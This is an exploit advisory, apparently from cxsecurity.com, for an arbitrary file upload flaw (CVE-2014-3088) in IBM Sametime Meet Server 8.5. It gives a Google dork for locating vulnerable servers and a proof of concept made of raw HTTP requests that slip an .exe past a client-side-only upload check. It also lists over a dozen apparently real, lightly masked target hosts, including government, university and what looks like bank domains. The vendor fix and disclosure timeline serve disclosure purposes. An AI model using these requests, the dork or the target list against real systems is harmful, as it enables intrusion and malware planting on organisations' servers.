IBM Sametime Meet Server 8.5 Arbitrary File Upload

2014.08.12
Credit: Adriano Marcio Monteiro
Risk: High
Local: No
Remote: Yes
CVE: CVE-2014-3088
CWE: CWE-264
Dork: intitle:\"New Meet - IBM Lotus Sametime\"


CVSS Base Score: 5.5/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

# Exploit Title: IBM Sametime Meet Server 8.5 Arbitrary File Upload # Google Dork: intitle:"New Meet - IBM Lotus Sametime" # Date: 11/08/2014 # CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:N/AC:M/Au:N/C:P/I:P/A:P # CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-3088 # OSVDB-ID: http://osvdb.org/108681 # # Author: Adriano Marcio Monteiro # E-mail: adrianomarciomonteiro@gmail.com # Blog: http://www.brazucasecurity.com.br # # Vendor: http://www.ibm.com # Software: http://www.ibm.com/sametime # Version: 8.5.1 # Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221 # # Test Type: Black Box # Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m Table of Contents [0x00] The Vulnerability [0x01] Exploit Description [0x02] PoC - Proof of Concept [0x03] Correction or Workaround [0x04] Timeline [0x05] Published [0x06] References [0x07] Bibliography [0x00] The Vulnerability Arbitray File Upload Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, and simple defacement. It depends on what the application does with the uploaded file and especially where it is stored. There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it. The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved. [0x01] Exploit Description IBM Sametime Meeting Server allow anonymous users to send arbitrary files by modifying the Content-Type header and file extension, as demonstrated by replacing a text/plain .txt upload with an application/octet-stream .exe upload. in the post request. The file upload restrictions occurs only client side. [0x02] PoC - Proof of Concept For exploit this vulnerability, you can use Burp Suite or another proxy of your choice. ************************ *** Original content *** ************************ POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1 Host: sametime02.myserver.com.br User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://sametime02.myserver.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------16704454925606 Content-Length: 729 -----------------------------16704454925606 Content-Disposition: form-data; name="__Click" 0 -----------------------------16704454925606 Content-Disposition: form-data; name="MeetingDocID" 5F1BF7DE56F68DA583257D040071276C -----------------------------16704454925606 Content-Disposition: form-data; name="AttachFlag" 1 -----------------------------16704454925606 Content-Disposition: form-data; name="AttachList" Sem Anexos -----------------------------16704454925606 Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.exe.txt" Content-Type: text/plain ... txt content ... -----------------------------16704454925606-- ************************ *** Modified content *** ************************ POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1 Host: sametime02.myserver.com.br User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://sametime02.bancobmg.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------16704454925606 Content-Length: 729 -----------------------------16704454925606 Content-Disposition: form-data; name="__Click" 0 -----------------------------16704454925606 Content-Disposition: form-data; name="MeetingDocID" 5F1BF7DE56F68DA583257D040071276C -----------------------------16704454925606 Content-Disposition: form-data; name="AttachFlag" 1 -----------------------------16704454925606 Content-Disposition: form-data; name="AttachList" Sem Anexos -----------------------------16704454925606 Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.exe" Content-Type: application/octet-stream ...EXE Content... -----------------------------16704454925606-- Examples: http://sametime.eletrXosul.gov.br/stconf.nsf/frmConference?OpenForm http://sametime.spX.gov.br/stconf.nsf/frmConference?OpenForm http://sametime.Xgrude.ufmg.br/stconf.nsf/frmConference?OpenForm http://sametimeX.schahin.com.br/stconf.nsf/frmConference?OpenForm http://sametime.Xc-pack.com.br/stconf.nsf/frmConference?OpenForm http://www.azi.coXm.br/stconf.nsf/frmConference?OpenForm http://aquila.seaXlinc.org/stconf.nsf/frmConference?Openform http://noteschat.Xsola.kommune.no/stconf.nsf/frmConference?Openform http://comware.Xnet/stconf.nsf/frmConference?Openform https://236wXs.dpteruel.es/stconf.nsf/frmConference?OpenForm https://correoXweb.gruposanjose.biz/stconf.nsf/frmConference?Openform http://noteschXat.sola.kommune.no/stconf.nsf/frmConference?Openform https://mail.Xdba.uz/stconf.nsf/frmConference?Openform [0x03] Correction or Workaround Apply the procedures described in the follow link: http://www-01.ibm.com/support/docview.wss?uid=swg21679454 [0x04] Timeline 18/07/2014 - Vulnerabilities discovered 19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team 23/07/2014 - Advisory and troubleshooting fix published [0x05] Published http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3088 http://www.securityfocus.com/bid/68291 [0x06] References OWASP - Unrestricted File Upload https://www.owasp.org/index.php/Unrestricted_File_Upload CWE-264: Permissions, Privileges, and Access Controls http://cwe.mitre.org/data/definitions/264.html [0x07] Bibliography http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent [end]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top